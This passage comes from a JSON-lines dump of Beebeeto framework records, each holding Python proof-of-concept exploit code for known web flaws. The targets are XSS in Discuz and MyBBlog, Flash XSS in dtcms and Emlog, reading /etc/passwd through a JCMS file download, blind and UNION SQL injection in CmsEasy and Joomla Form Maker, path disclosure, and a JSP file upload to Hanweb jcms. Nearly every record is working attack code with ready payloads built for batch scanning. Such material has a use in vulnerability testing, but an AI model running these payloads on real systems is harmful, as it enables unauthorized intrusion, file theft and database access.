MyPoc()\r\n pprint(mp.run())", "desc": "Vulnerable File: index.php?option=com_beacondecode&task=", "app_name": "Joomla", "id": "poc-2014-0126", "layer4_protocol": null}
{"create_date": "2014-10-29 13:30:38", "name": "Discuz! 6.0 /viewthread.php \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "tmp", "rank": 2, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "Discuz\u6f0f\u6d1e,XSS\u6f0f\u6d1e,/viewthread.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0125',\r\n 'name': 'Discuz! 6.0 /viewthread.php \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC',\r\n 'author': 'tmp',\r\n 'create_date': '2014-10-29',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Discuz',\r\n 'vul_version': ['6.0'],\r\n 'type': 'Cross Site Scripting',\r\n 'tag': ['Discuz\u6f0f\u6d1e', 'XSS\u6f0f\u6d1e', '/viewthread.php', 'php'],\r\n 'desc': 'Cross site scripting has benn found on viewthread.php file.',\r\n 'references': ['https://www.yascanner.com/#!/x/11200',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n verify_url = args['options']['target'] + '/viewthread.php?tid=\"/><script>alert(233)</script>'\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if '\"/><script>alert(233)</script>' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "Cross site scripting has benn found on viewthread.php file.", "app_name": "Discuz", "id": "poc-2014-0125", "layer4_protocol": null}
{"create_date": "2014-10-28 17:05:44", "name": "dtcms 3.0 /scripts/swfupload/swfupload.swf \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "\u5927\u5b69\u5c0f\u5b69", "rank": 2, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "dtcms\u6f0f\u6d1e,xss,/scripts/swfupload/swfupload.swf", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport md5\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0124',\r\n 'name': 'dtcms 3.0 /scripts/swfupload/swfupload.swf \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC',\r\n 'author': '\u5927\u5b69\u5c0f\u5b69',\r\n 'create_date': '2014-10-28',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'dtcms',\r\n 'vul_version': ['3.0'],\r\n 'type': 'Cross Site Scripting',\r\n 'tag': ['dtcms\u6f0f\u6d1e', 'xss', '/scripts/swfupload/swfupload.swf'],\r\n 'desc': 'dtcms 3.0 /scripts/swfupload/swfupload.swf\u6587\u4ef6\u5b58\u5728FlashXss\u6f0f\u6d1e\u3002',\r\n 'references': ['http://www.wooyun.org/bugs/wooyun-2010-069817',\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n flash_md5 = \"3a1c6cc728dddc258091a601f28a9c12\"\r\n verify_url = args['options']['target'] + \"/scripts/swfupload/swfupload.swf\"\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n request = urllib2.Request(verify_url)\r\n response = urllib2.urlopen(request)\r\n content = response.read()\r\n md5_value = md5.new(content).hexdigest()\r\n if md5_value in flash_md5:\r\n args['success'] = True\r\n args['poc_ret']['xss_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "dtcms 3.0 /scripts/swfupload/swfupload.swf\u6587\u4ef6\u5b58\u5728FlashXss\u6f0f\u6d1e\u3002", "app_name": "Other", "id": "poc-2014-0124", "layer4_protocol": null}
{"create_date": "2014-10-28 16:50:56", "name": "\u5927\u6c49JCMS\u5185\u5bb9\u7ba1\u7406\u7cfb\u7edf /jcms/m_5_9/sendreport/downfile.jsp \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e Exploit", "level": "\u4e2d\u5371", "batchable": 1, "author": "\u96f7\u950b", "rank": 3, "port": null, "vul_type": "\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d", "tag": "\u5927\u6c49jcms\u6f0f\u6d1e,\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e,/jcms/m_5_9/sendreport/downfile.jsp,jsp", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0122',\r\n 'name': '\u5927\u6c49JCMS\u5185\u5bb9\u7ba1\u7406\u7cfb\u7edf /jcms/m_5_9/sendreport/downfile.jsp \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e Exploit',\r\n 'author': '\u96f7\u950b',\r\n 'create_date': '2014-10-28',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'JCMS',\r\n 'vul_version': '5.9',\r\n 'type': 'Arbitrary File Download',\r\n 'tag': ['\u5927\u6c49jcms\u6f0f\u6d1e', '\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e', '/jcms/m_5_9/sendreport/downfile.jsp', 'jsp'],\r\n 'desc': 'N/A',\r\n 'references': ['N/A',\r\n ]\r\n },\r\n }\r\n\r\n @classmethod\r\n\r\n def verify(cls, args):\r\n verify_url = args['options']['target'] + ('/jcms/m_5_9/sendreport/downfile.jsp?filename=/etc/passwd&'\r\n 'savename=passwd.txt')\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if \"root:\" in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "N/A", "app_name": "JCMS", "id": "poc-2014-0122", "layer4_protocol": null}
{"create_date": "2014-10-27 22:54:10", "name": "MyBB MyBBlog 1.0 /inc/plugins/mybblog/modules/tag.php \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "foundu", "rank": 2, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "MyBB\u6f0f\u6d1e,XSS\u6f0f\u6d1e,/inc/plugins/mybblog/modules/tag.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0120',\r\n 'name': 'MyBB MyBBlog 1.0 /inc/plugins/mybblog/modules/tag.php \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC',\r\n 'author': 'foundu',\r\n 'create_date': '2014-10-27',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'MyBB',\r\n 'vul_version': ['1.0'],\r\n 'type': 'Cross Site Scripting',\r\n 'tag': ['MyBB\u6f0f\u6d1e', 'XSS\u6f0f\u6d1e', '/inc/plugins/mybblog/modules/tag.php', 'php'],\r\n 'desc': 'N/A',\r\n 'references': ['https://www.yascanner.com/#!/x/20583',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n verify_url = args['options']['target'] + '/mybblog.php?action=tag&tag=\"/><script>alert(1)</script>'\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if '\"/><script>alert(1)</script>' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "Location File : \r\n/inc/plugins/mybblog/modules/tag.php\r\n\r\nCode :\r\n\r\nadd_breadcrumb($lang->sprintf($lang->mybblog_tags, $mybb->get_input(\"tag\")), \"mybblog.php?action=tag&tag={$mybb->get_input('tag')}\");\r\n\r\n$articles = Article::getByTag($mybb->get_input(\"tag\"));\r\n\r\nNothing Filtering HTML", "app_name": "MyBB", "id": "poc-2014-0120", "layer4_protocol": null}
{"create_date": "2014-10-27 11:41:48", "name": "PHPCMS v9 /phpsso_server Infomation Disclosure POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "flsf", "rank": 2, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "PHPCMS\u6f0f\u6d1e,/phpsso_server,Infomation Disclosure,\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0117',\r\n 'name': 'PHPCMS v9 /phpsso_server Infomation Disclosure POC',\r\n 'author': 'flsf',\r\n 'create_date': '2014-10-27',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'PHPCMS',\r\n 'vul_version': ['V9'],\r\n 'type': 'Infomation Disclosure',\r\n 'tag': ['PHPCMS\u6f0f\u6d1e', '/phpsso_server', 'Infomation Disclosure', '\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e', 'php'],\r\n 'desc': 'The functions in the global.func.php can not handle with array,so it raise an error.',\r\n 'references': ['',\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n verify_url = args['options']['target'] + \"/phpsso_server/?m=phpsso&c=index&a=getuserinfo&appid=1&data%5busername%5d=ks\"\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n try:\r\n request = urllib2.Request(verify_url)\r\n response = urllib2.urlopen(request)\r\n content = response.read()\r\n except urllib2.HTTPError, e:\r\n content = e.read()\r\n\r\n match = cls.match_patter(content)\r\n if match:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n args['poc_ret']['Disclosure'] = match[0]\r\n return args\r\n args['success'] = False\r\n return args\r\n\r\n @staticmethod\r\n def match_patter(content, pattern=r'Warning.*?((?:[a-z]:\\\\(?:[\\\\\\w|\\s|\\-|\\.|\\x81-\\xfe|\\x40-\\xfe]+?)global\\.func\\.php)|(?:/[^<>]+?global\\.func\\.php))'):\r\n match = re.findall(pattern, content, re.I|re.M)\r\n return match\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == \"__main__\":\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "The functions in the global.func.php can not handle with array,so it raise an error.", "app_name": "phpcms", "id": "poc-2014-0117", "layer4_protocol": null}
{"create_date": "2014-10-27 00:09:17", "name": "CmsEasy 5.5 <=20140718 /index.php SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 0, "author": "H4rdy", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "CmsEasy\u76f2\u6ce8\u6f0f\u6d1e,SQL\u6ce8\u5165\u6f0f\u6d1e,/index.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\nimport datetime\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0116',\r\n 'name': 'CmsEasy 5.5 <=20140718 /index.php SQL\u6ce8\u5165\u6f0f\u6d1e POC',\r\n 'author': 'H4rdy',\r\n 'create_date': '2014-10-25',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'CmsEasy',\r\n 'vul_version': ['5.5'],\r\n 'type': 'SQL Injection',\r\n 'tag': ['CmsEasy\u76f2\u6ce8\u6f0f\u6d1e', 'SQL\u6ce8\u5165\u6f0f\u6d1e', '/index.php', 'php'],\r\n 'desc': 'CmsEasy 5.5 <=20140718 /lib/table/stats.php\u4e2d$_SERVER\u5e76\u6ca1\u6709\u8f6c\u4e49\uff0c\u9020\u6210\u4e86\u6ce8\u5165.',\r\n 'references': ['http://www.wooyun.org/bugs/wooyun-2010-069343',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = \"/index.php/aaa',(select/**/if((select/**/ord(substr(user(),1,1)))=114,sleep(6),0)),1)#\"\r\n verify_url = args['options']['target'] + payload\r\n user_agent = {'User-Agent':'i am baiduspider'}\r\n req = urllib2.Request(verify_url, headers=user_agent)\r\n first_time = datetime.datetime.now()\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n last_time = datetime.datetime.now()\r\n different_time = (last_time-first_time).seconds\r\n if different_time>=6:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "CmsEasy 5.5 <=20140718 /lib/table/stats.php\u4e2d$_SERVER\u5e76\u6ca1\u6709\u8f6c\u4e49\uff0c\u9020\u6210\u4e86\u6ce8\u5165.", "app_name": "CmsEasy", "id": "poc-2014-0116", "layer4_protocol": null}
{"create_date": "2014-10-24 20:20:17", "name": "Joomla Spider Form Maker <=3.4 SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "H4rdy", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "Joomla\u6f0f\u6d1e,SQL\u6ce8\u5165\u6f0f\u6d1e,/index.php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0111',\r\n 'name': 'Joomla Spider Form Maker <=3.4 SQL\u6ce8\u5165\u6f0f\u6d1e POC',\r\n 'author': 'H4rdy',\r\n 'create_date': '2014-10-24',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Joomla Spider From Maker',\r\n 'vul_version': ['<=3.4'],\r\n 'type': 'SQL Injection',\r\n 'tag': ['Joomla\u6f0f\u6d1e', 'SQL\u6ce8\u5165\u6f0f\u6d1e', '/index.php'],\r\n 'desc': 'Joomla 3.4 /index.php \u6587\u4ef6\"id\" \u53d8\u91cf\u6ca1\u6709\u8fdb\u884c\u8fc7\u6ee4.',\r\n 'references': ['http://www.exploit-db.com/exploits/34637/',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = (\"/index.php?option=com_formmaker&view=formmaker&id=1%20UNION%20ALL%20SELECT%20NULL,\"\r\n \"NULL,NULL,NULL,NULL,CONCAT(0x7165696a71,IFNULL(CAST(md5(3.1415)%20AS%20CHAR),0x20),\"\r\n \"0x7175647871),NULL,NULL,NULL,NULL,NULL,NULL,NULL%23\")\r\n verify_url = args['options']['target'] + payload\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if \"63e1f04640e83605c1d177544a5a0488\" in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "Joomla 3.4 /index.php \u6587\u4ef6\"id\" \u53d8\u91cf\u6ca1\u6709\u8fdb\u884c\u8fc7\u6ee4.", "app_name": "Joomla", "id": "poc-2014-0111", "layer4_protocol": null}
{"create_date": "2014-10-23 21:50:56", "name": "Hanweb jcms /opr_import_discussion.jsp \u4efb\u610f\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e POC", "level": "\u9ad8\u5371", "batchable": 1, "author": "flsf", "rank": 4, "port": null, "vul_type": "\u6587\u4ef6\u4e0a\u4f20", "tag": "Hanweb\u6f0f\u6d1e,/opr_import_discussion.jsp,File Upload,jsp", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0109',\r\n 'name': 'Hanweb jcms /opr_import_discussion.jsp \u4efb\u610f\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e POC',\r\n 'author': 'flsf',\r\n 'create_date': '2014-10-23',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Hanweb jcms',\r\n 'vul_version': ['*'],\r\n 'type': 'File Upload',\r\n 'tag': ['Hanweb\u6f0f\u6d1e', '/opr_import_discussion.jsp', 'File Upload', 'jsp'],\r\n 'desc': '''\r\n http://127.0.0.1/jcms/m_5_e/module/idea/opr_import_discussion.jsp?typeid=0&fn_billstatus=S\r\n \u53ef\u4e0a\u4f20\u6587\u4ef6,\u672a\u9650\u5236\u4e0a\u4f20\u6587\u4ef6\u7c7b\u578b,\u5bfc\u81f4\u4efb\u610f\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e\u3002\r\n ''',\r\n 'references': ['http://wooyun.org/bugs/wooyun-2014-075585',\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n verify_url = args['options']['target'] + \"/jcms/jcms_files/jcms/web0/site/module/idea/tem/upload/v.jsp\"\r\n target_url = args['options']['target'] + \"/jcms/m_5_e/module/idea/opr_import_discussion.jsp?typeid=0&fn_billstatus=S\"\r\n file_v_jsp = '''<%@ page import=\"java.util.*,java.io.*\" %>\r\n <%@ page import=\"java.io.*\"%>\r\n <%\r\n String path=application.getRealPath(request.getRequestURI());\r\n File d=new File(path);\r\n out.println(path);\r\n if(d.exists()){\r\n d.delete();\r\n }\r\n %>\r\n <% out.println(\"00799a96dcc29282dd74e23e49b647a6a\");%>\r\n '''\r\n files = {'file': ('v.jsp', file_v_jsp, 'multipart/form-data')}\r\n\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n\r\n response = requests.post(target_url, files=files) # \u4e0a\u4f20\r\n response = requests.get(verify_url) # \u9a8c\u8bc1\r\n content = response.content\r\n if '00799a96dcc29282dd74e23e49b647a6a' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n args['success'] = False\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == \"__main__\":\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "http://127.0.0.1/jcms/m_5_e/module/idea/opr_import_discussion.jsp?typeid=0&fn_billstatus=S\r\n\u53ef\u4e0a\u4f20\u6587\u4ef6,\u672a\u9650\u5236\u4e0a\u4f20\u6587\u4ef6\u7c7b\u578b,\u5bfc\u81f4\u4efb\u610f\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e\u3002", "app_name": "Other", "id": "poc-2014-0109", "layer4_protocol": null}
{"create_date": "2014-10-23 00:20:15", "name": "U-Mail /webmail/userapply.php \u8def\u5f84\u6cc4\u6f0f POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "\u96f7\u8702", "rank": 2, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "Information Disclosure,U-Mail\u6f0f\u6d1e,/webmail/userapply.php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0105',\r\n 'name': 'U-Mail /webmail/userapply.php \u8def\u5f84\u6cc4\u6f0f POC',\r\n 'author': '\u53f6\u5b50',\r\n 'create_date': '2014-10-23',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'U-Mail',\r\n 'vul_version': ['*'],\r\n 'type': 'Information Disclosure',\r\n 'tag': ['Information Disclosure', 'U-Mail\u6f0f\u6d1e', '/webmail/userapply.php'],\r\n 'desc': 'N/A',\r\n 'references': ['http://wooyun.org/bugs/wooyun-2010-049525'],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n verify_url = args['options']['target'] + '/webmail/userapply.php?execadd=333&DomainID=111'\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n res = re.compile(r'supplied argument is not a valid MySQL result resource in <b>(.*)</b> on line')\r\n match = res.findall(content)\r\n if match:\r\n if '<b>Warning</b>:' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n args['success'] = False\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "N/A", "app_name": "U-Mail", "id": "poc-2014-0105", "layer4_protocol": null}
{"create_date": "2014-10-22 20:26:10", "name": "Emlog 5.3.1 /include/lib/js/uploadify/uploadify.swf \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "\u5927\u5b69\u5c0f\u5b69", "rank": 2, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "emblog\u6f0f\u6d1e,xss,php,/uploadify.swf", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport md5\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0103', # \u7531Beebeeto\u5b98\u65b9\u7f16\u8f91\r\n 'name': 'Emlog 5.3.1 /include/lib/js/uploadify/uploadify.swf \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC', # \u540d\u79f0\r\n 'author': '\u5927\u5b69\u5c0f\u5b69', # \u4f5c\u8005\r\n 'create_date': '2014-10-22', # \u7f16\u5199\u65e5\u671f\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http', # \u8be5\u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u534f\u8bae\u540d\u79f0\r\n 'port': [80], # \u8be5\u534f\u8bae\u5e38\u7528\u7684\u7aef\u53e3\u53f7\uff0c\u9700\u4e3aint\u7c7b\u578b\r\n 'layer4_protocol': ['tcp'], # \u8be5\u534f\u8bae\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'emblog', # \u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u5e94\u7528\u540d\u79f0\r\n 'vul_version': ['5.3.1'], # \u53d7\u6f0f\u6d1e\u5f71\u54cd\u7684\u5e94\u7528\u7248\u672c\r\n 'type': 'Cross Site Scripting', # \u6f0f\u6d1e\u7c7b\u578b\r\n 'tag': ['emblog\u6f0f\u6d1e', 'xss', 'php', '/uploadify.swf'], # \u6f0f\u6d1e\u76f8\u5173tag\r\n 'desc': 'emblog include/lib/js/uploadify/uploadify.swf\u6587\u4ef6\u5b58\u5728FlashXss\u6f0f\u6d1e\u3002', # \u6f0f\u6d1e\u63cf\u8ff0\r\n 'references': ['http://www.wooyun.org/bugs/wooyun-2010-069818', # \u53c2\u8003\u94fe\u63a5\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n flash_md5 = \"3a1c6cc728dddc258091a601f28a9c12\"\r\n verify_url = args['options']['target'] + \"/include/lib/js/uploadify/uploadify.swf\"\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n request = urllib2.Request(verify_url)\r\n response = urllib2.urlopen(request)\r\n content = response.read()\r\n md5_value = md5.new(content).hexdigest()\r\n if md5_value in flash_md5:\r\n args['success'] = True\r\n args['poc_ret']['xss_url'] = verify_url\r\n return args\r\n else:\r\n args['success'] = False\r\n return args\r\n\r\n exploit = 